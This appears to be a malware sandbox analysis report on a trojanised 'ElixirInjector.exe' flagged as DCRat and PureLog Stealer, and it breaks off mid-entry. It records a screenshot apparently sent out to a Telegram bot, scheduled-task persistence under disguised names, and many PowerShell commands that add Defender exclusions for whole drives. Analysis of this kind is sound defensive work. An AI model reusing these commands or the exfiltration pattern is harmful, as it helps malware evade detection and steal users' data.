2025-01-13 12:20:32 UTC	4096	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1AQa"q2
2025-01-13 12:20:32 UTC	4096	OUT	Data Raw: d7 b5 91 7f 16 af a4 7f f6 e3 c5 e2 5f f7 2c 3f f8 aa 7e 54 c4 a2 83 45 7d 21 f1 c1 49 4b 49 40 05 26 29 68 a0 62 51 41 a2 80 0a 4e 69 69 0d 31 85 25 2d 14 00 94 52 e2 92 81 89 45 2e 29 28 01 3b d1 47 7a 28 18 50 68 a2 80 12 8a 28 a0 62 1a 4a 75 21 a0 02 92 96 83 40 0d c5 14 b4 50 31 29 29 68 a0 62 51 45 14 00 94 50 68 a0 77 10 d2 62 9d 49 40 c4 a2 96 92 80 41 8a 4a 5a 0d 03 1b 8a 29 68 a0 04 c5 25 2d 14 0c 69 a2 94 d2 50 30 a4 a5 a4 a6 01 49 8a 5a 4a 43 03 49 4b 49 40 c4 a2 96 92 80 0a 42 29 68 a0 63 48 a2 96 92 81 89 47 7a 53 49 40 c4 a3 14 b4 86 81 88 45 21 a7 1a 4a 00 4f ad 25 29 14 98 e2 81 89 9a 38 eb 4b 49 41 42 52 53 8d 20 a0 10 98 f6 a0 d0 68 a0 62 1a 3f ce 28 ed 45 01 71 3a 51 8c 71 4a 4d 27 7e f4 c6 07 14 86 96 92 90 c4 39 f5 a4 a7 72 29 08 ff Data Ascii: _,?~TE}!IKI@&)hbQANii1%-RE.)(;Gz(Ph(bJu!@P1))hbQEPhwbI@AJZ)h%-iP0IZJCIKI@B)hcHGzSI@E!JO%)8KIABRS hb?(Eq:QqJM'~9r)
2025-01-13 12:20:32 UTC	4096	OUT	Data Raw: 4f 35 23 9a 4b b1 29 88 87 52 ac 02 ee c3 11 8c 01 d0 d5 ef 2e 3c e7 62 e7 d7 14 9e 54 64 e4 c6 b9 f5 c5 44 b2 68 3f b4 ff 00 a5 6f c8 d5 67 d5 17 d8 5f f0 6f 72 85 ba c3 71 67 6f 15 cd fd 8d 9d d4 5a 84 b7 2d 11 b7 91 15 d5 a3 89 46 c1 14 65 07 28 78 e2 b4 15 b7 28 3e b4 86 28 d8 e4 a2 93 ee 29 dd 06 05 7a 18 7c 32 a1 cd 67 a3 3c cc 56 29 e2 39 79 96 a9 5b f5 0a 4a 5a 4a e9 39 02 92 96 8a 00 4a 28 34 50 31 28 a2 8c 50 01 41 a2 8a 06 25 14 b8 a4 a6 02 62 8a 5a 4a 00 28 a2 8a 06 25 14 b8 a3 14 00 94 94 ec 52 50 02 51 4b 49 40 c4 a4 a7 52 1a 06 25 14 11 45 00 14 94 b4 50 02 51 45 14 0c 29 31 41 a2 9d 80 4a 4a 75 25 16 18 94 52 d2 50 30 a4 a5 a0 d2 b0 0d c5 14 b4 53 18 da 29 68 c5 03 1b 45 2d 25 2b 00 62 92 96 92 99 42 62 92 9d 49 40 09 8a 29 69 28 18 84 52 Data Ascii: O5#K)R.<bTdDh?og_orqgoZ-Fe(x(>()z\|2g<V)9y[JZJ9J(4P1(PA%bZJ(%RPQKI@R%EPQE)1AJJu%RP0S)hE-%+bBbI@)i(R
2025-01-13 12:20:32 UTC	4096	OUT	Data Raw: d1 c3 55 75 79 aa 46 c9 af 23 94 b9 d2 2f 12 d2 c2 38 be 1d f9 c1 20 20 a7 f6 d8 5f 24 f9 8e 76 67 3f 37 5d d9 ff 00 6f 1d aa 0f 88 ff 00 f2 31 41 ff 00 5e 8b ff 00 a1 bd 7a 85 79 7f c4 7f f9 18 a0 ff 00 af 45 ff 00 d0 de bd 3c ad 5b 17 0f 9f e4 c9 cd 69 46 18 2a 9c ab b7 6e e8 e4 29 29 68 af ae 3e 24 4a 29 69 29 81 a9 e1 bf f9 19 74 df fa f8 4f e7 5d 27 8f bc 43 3e 8d a9 5d 5a da e5 26 bd b2 85 7c d0 7e e2 ab cd 9c 7b 9d c3 f5 ae 6f c3 9f f2 32 e9 bf f5 f2 9f ce ba ef 1a f8 2b 52 f1 26 b3 0d e5 9c f6 89 1a 5b ac 44 4c ec 0e 43 31 ec a7 8f 98 57 8d 8a 74 96 36 3e d7 6e 5f d5 9f 47 97 2a af 01 2f 65 bf 37 e8 8f 2a b2 bd b8 d3 af 61 bc b5 90 c7 3c 2d b9 18 7f 9e 95 d9 5a 78 bc d8 78 a1 75 a0 ce d6 5a 8a a8 ba 84 9c 98 d9 40 04 0f a7 51 ec d8 a4 ff 00 85 57 Data Ascii: UuyF#/8 _$vg?7]o1A^zyE<[iFn))h>$J)i)tO]'C>]Z&\|~{o2+R&[DLC1Wt6>n_G/e7*a<-ZxxuZ@QW
2025-01-13 12:20:34 UTC	1558	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 13 Jan 2025 12:20:33 GMT Content-Type: application/json Content-Length: 1169 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":7710,"from":{"id":7622199935,"is_bot":true,"first_name":"herreeeee","username":"dlvyhostagentbot"},"chat":{"id":6275749393,"first_name":"Dupu","username":"ya_Nyashka","type":"private"},"date":1736770833,"photo":[{"file_id":"AgACAgQAAxkDAAIeHmeFBRHJF1CPXPVRRwhobkMEVisHAAIKyTEbptQpUOcy00lgzl-KAQADAgADcwADNgQ","file_unique_id":"AQADCskxG6bUKVB4","file_size":1098,"width":90,"height":72},{"file_id":"AgACAgQAAxkDAAIeHmeFBRHJF1CPXPVRRwhobkMEVisHAAIKyTEbptQpUOcy00lgzl-KAQADAgADbQADNgQ","file_unique_id":"AQADCskxG6bUKVBy","file_size":14076,"width":320,"height":256},{"file_id":"AgACAgQAAxkDAAIeHmeFBRHJF1CPXPVRRwhobkMEVisHAAIKyTEbptQpUOcy00lgzl-KAQADAgADeAADNgQ","file_unique_id":"AQADCskxG6bUKVB9","file_size":58261,"width":800,"height":640},{"file_id":"AgACAgQAAxkDAAIeHmeFBRHJF1CPXPVRRwhobkMEVisHAAIKyTEbptQpUOcy00lgzl-KAQADAgADeQADNgQ","file_unique_id":"AQADCskxG6bUKVB-","file_size":85899,"width":1280,"height":1024}],"caption":"hello\nID: a0fccb9e88510f94cb0deffd3c62127052b2afe3\nCommen [TRUNCATED]

Target ID:	0
Start time:	07:20:01
Start date:	13/01/2025
Path:	C:\Users\user\Desktop\ElixirInjector.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ElixirInjector.exe"
Imagebase:	0xf10000
File size:	1'968'011 bytes
MD5 hash:	04095B54D4245DCA4AEB05310A2DDC8A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	07:20:06
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\QUJ9Bg46i5eTnOQKEnteAp7rp1YY9NQfmUbhx6iPrrb4U6kE.vbe"
Imagebase:	0xbf0000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	07:20:09
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\6iq5IFzZA9EyHTwKHM8vXk9USXtHecApoG.bat" "
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	07:20:09
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	07:20:10
Start date:	13/01/2025
Path:	C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\WinRAR/data/bin/unistall/Bluestacks.exe"
Imagebase:	0x160000
File size:	150'484'992 bytes
MD5 hash:	E18151C31580AA91CEB01099DE4277B2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2669535434.0000000012933000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000000.2216100697.0000000000162000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 58%, ReversingLabs Detection: 59%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	07:20:28
Start date:	13/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe'" /f
Imagebase:	0x7ff7f39f0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	07:20:28
Start date:	13/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "fvXBwqYdGYPkplbuTcoXecCdPf" /sc MINUTE /mo 9 /tr "'C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe'" /f
Imagebase:	0x7ff7f39f0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	07:20:29
Start date:	13/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "fvXBwqYdGYPkplbuTcoXecCdPf" /sc MINUTE /mo 7 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe'" /rl HIGHEST /f
Imagebase:	0x7ff7f39f0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	07:20:31
Start date:	13/01/2025
Path:	C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe
Imagebase:	0x60000
File size:	150'484'992 bytes
MD5 hash:	E18151C31580AA91CEB01099DE4277B2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	07:20:31
Start date:	13/01/2025
Path:	C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe
Imagebase:	0xe10000
File size:	150'484'992 bytes
MD5 hash:	E18151C31580AA91CEB01099DE4277B2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	07:20:32
Start date:	13/01/2025
Path:	C:\Windows\ShellComponents\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\ShellComponents\cmd.exe
Imagebase:	0x4e0000
File size:	150'484'992 bytes
MD5 hash:	E18151C31580AA91CEB01099DE4277B2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	07:20:33
Start date:	13/01/2025
Path:	C:\Windows\ShellComponents\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\ShellComponents\cmd.exe
Imagebase:	0x100000
File size:	150'484'992 bytes
MD5 hash:	E18151C31580AA91CEB01099DE4277B2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Analysis Process: fontdrvhost.exePID: 6852, Parent PID: 1064

General

Target ID:	29
Start time:	07:20:34
Start date:	13/01/2025
Path:	C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe"
Imagebase:	0x610000
File size:	150'484'992 bytes
MD5 hash:	E18151C31580AA91CEB01099DE4277B2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 58%, ReversingLabs Detection: 59%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	07:20:33
Start date:	13/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	07:20:33
Start date:	13/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	07:20:33
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	33
Start time:	07:20:33
Start date:	13/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	07:20:33
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	35
Start time:	07:20:33
Start date:	13/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	07:20:33
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	37
Start time:	07:20:33
Start date:	13/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	07:20:33
Start date:	13/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	07:20:33
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	40
Start time:	07:20:33
Start date:	13/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	07:20:33
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	42
Start time:	07:20:33
Start date:	13/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	07:20:33
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	44
Start time:	07:20:33
Start date:	13/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	07:20:33
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	46
Start time:	07:20:33
Start date:	13/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	07:20:33
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	48
Start time:	07:20:33
Start date:	13/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	07:20:33
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	50
Start time:	07:20:33
Start date:	13/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	07:20:33
Start date:	13/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ShellComponents\cmd.exe'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	07:20:33
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	53
Start time:	07:20:33
Start date:	13/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	07:20:33
Start date:	13/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	07:20:33
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	56
Start time:	07:20:34
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	57
Start time:	07:20:34
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	58
Start time:	07:20:34
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	59
Start time:	07:20:34
Start date:	13/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\7-Zip\fvXBwqYdGYPkplbuTcoXecCdP.exe'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	07:20:34
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7403e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	61
Start time:	07:20:34
Start date:	13/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
